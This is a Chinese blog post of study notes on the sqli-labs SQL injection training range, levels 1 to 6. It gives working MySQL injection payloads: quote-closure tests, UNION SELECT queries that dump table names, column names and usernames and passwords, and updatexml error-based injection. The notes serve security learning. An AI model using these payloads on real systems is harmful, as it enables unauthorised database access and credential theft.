sqli-labs笔记

已于 2023-05-31 15:01:27 修改
阅读量1.1k 收藏
点赞数 2
分类专栏: 信息安全 文章标签: mysql 安全 信息安全
于 2021-08-20 13:06:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52920608/article/details/119820138
版权

目录

前言

如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。
另外-- (这里有一个空格,–空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。

用到的一些东西:

1. concat(str1,str2,...) #没有分隔符地连接字符串
2. concat_ws(separator,str1,str2,...) #含有分隔符地连接字符串
3. group_concat(str1,str2,...) #连接一个组的所有字符串,并以逗号分隔每一条数据
说着比较抽象,其实也并不需要详细了解,知道这三个函数能一次性查出所有信息就行了。

order by #猜字段
database() #爆数据库名
user() #爆数据库用户名

union ..... 联合查询
selcet group_concat(table_name) from information_schema.tables where table_schema='security' 
#查询指定数据库security的表名

select group_concat(column_name)from information_schema.columns where table_name='user' 
#查询指定表的列名信息

select 1,group_concat(username),group_concat(password) from security.user
#获取数据

注入流程

在这里插入图片描述mysql数据库存储的数据按照上图的形式,一个数据库当中有很多的数据表,数据表当中有很多的列,每一列当中存储着数据。我们注入的过程就是先拿到数据库名,在获取到当前数据库名下的数据表,再获取当前数据表下的列,最后获取数据。

第一关

1.id=1’ 页面不正常,表示可能存在SQL字符注入,输入–+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入
在这里插入图片描述在这里插入图片描述
2.使用order by猜字段

在这里插入图片描述
在这里插入图片描述
超过3报错说明有3个
3.将id=1改为一个数据库不存在的id值,如-1,使用union select 1,2,3联合查询语句查看页面是否有显示位。
在这里插入图片描述
有两个显示位

4.爆数据库名和数据库用户

id=-1' union 1,database(),user() --+

在这里插入图片描述5.爆表名

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+

在这里插入图片描述
6.爆列名

id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' --+

在这里插入图片描述
7.爆用户名,密码

id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+

在这里插入图片描述

第二关

1.id=1 and 1=1,id=1 and 1=2判断数值型注入
2.order by 3 页面显示正常,order by 4页面显示不正常,所以该表有3列数据
接着可以使用联合查询进行注入,详细过程参考第一关

第三关

1.向页面输入?id=1’ --+页面显示不正常,但?id=1’) --+显示正常,说明是字符型注入,且是(‘’)闭合的
在这里插入图片描述
在这里插入图片描述
后续过程参考第一关
2.接着使用order by 判断表中有3列数据
3.接着使用联合查询,union select 1,2,3 判断页面是否有显示位
4.爆表名列名数据

第四关

1.与第三关类似,第四关使用 (“”) 的方式闭合字符串,然后可以优先使用联合查询注入 (多试几次就知道了)
2.判断完类型后,后续步骤跟第一关差不多。

?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

第五关

盲注类型,单引号闭合
可以使用报错注入

?id=1' and updatexml(0x7e,concat(0x7e,database(),0x7e),0x7e)--+

第六关

同上,双引号闭合,可以使用报错注入

?id=1" and updatexml(0x7e,concat(0x7e,database(),0x7e),0x7e)--+
XXX_WXY
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqli-Labs.zip
07-15
对前四道题目进行加强,输出在数据库中构成的查询语句,有利于新手快速入门SQLi;
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs 下载、安装
04-20 733
sqli-labs 下载、安装 下载地址:https://github.com/Audi-1/sqli-labs phpstudy:http://down.php.cn/PhpStudy20180211.zip 所需安装环境支持包:http://www.pc6.com/softview/SoftView_104246.html Tips:务必将sql的版本调到5.5以上,因为这样你的数据...
sqli-labs
qq_51110485的博客
07-16 1073
sqli-labsLess-1Less-2Less-3Less-4Less-5Less-6 Less-1 进入关卡内,先判断是否存在注入情况 先输入?id =1 and 1=1,发现没有变化,换成?id=1 and 1=2,依旧没有变化,考虑是为字符型而非整形。 用?id=1'进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入 发现为字符型的后先在后面加一个注释符 --+,可以正常输出 单行注释: 1.使用#注释符,#注释符后直接加注释内容 2.使用–注释符,–注释符后需要加一个空格,注释才能
sqli-labs 38-45
遇事不决冲冲冲
04-09 1114
第38关 堆叠注入:简单理解就是一条语句结束后再连接一条语句,这就叫堆叠注入。 举几个最简单的例子: 查询数据并创建一个数据库:select * from users;creat database test; 查询数据并删除一个数据库:select * from users;drop database test; 查询数据并插入数据:select * from users;insert into users(id,username,password) values(‘id’,‘username’,‘pas
SQLi Labs Lesson17
1ame的博客
08-15 1149
Lesson - 17 Update Query - Error Based - String 首先进入欢迎界面: 本页面的作用是重置用户的密码。 本节对注入有过滤。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = sub
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
SQLI-LABS环境搭建
12-12
SQLI-LABS环境搭建,里面包含PhpStudy2018和sqli-labs-ma
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sqli labs less17
Xiaoxiaoqiang_的博客
03-03 216
sql注入
sqli-labs下载与安装
浅笑996的博客
09-28 1万+
Sqli-labs 下载 Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程。 博客地址为:http://dummy2dummies.blogspot.hk/, 博客当中有一些示例,国内很多博客内容都是从该作者的博客翻译过来的。同时该作者也发了一套相关的视频,在youtube上可以查看。 此处考虑到有些朋友不会FQ,遂分享到国内地址。 http://pan.baidu.com...
sqli - labs - 4
m0_62102000的博客
07-05 191
GET - Error based - Double Quotes - String
sqli-labs 1-10(GET型注入)新手通关详解(高手误入)
b1n的博客
07-16 3053
1.第一关是单引号字符型注入2.用--+进行注释,页面正常显示。
搭建学习环境(一)——sqlilabs
baynk的博客
02-20 3520
趁还有时间,用家里的x220搭个用来学习php和html的web server,顺便搭下测试平台。。。而且才知道可以用html语言写博客,终于可以不用“智能”编辑器了,又给自己找了一个写博客的理由,哈哈。 安装centos6.10 1.虽然8都快出了,但还是用6先用着吧,习惯了。。。 2.安装完后,更改固定IP地址,关闭iptables,关闭selinux(/etc/sysconfig/selin...
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XXX_WXY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值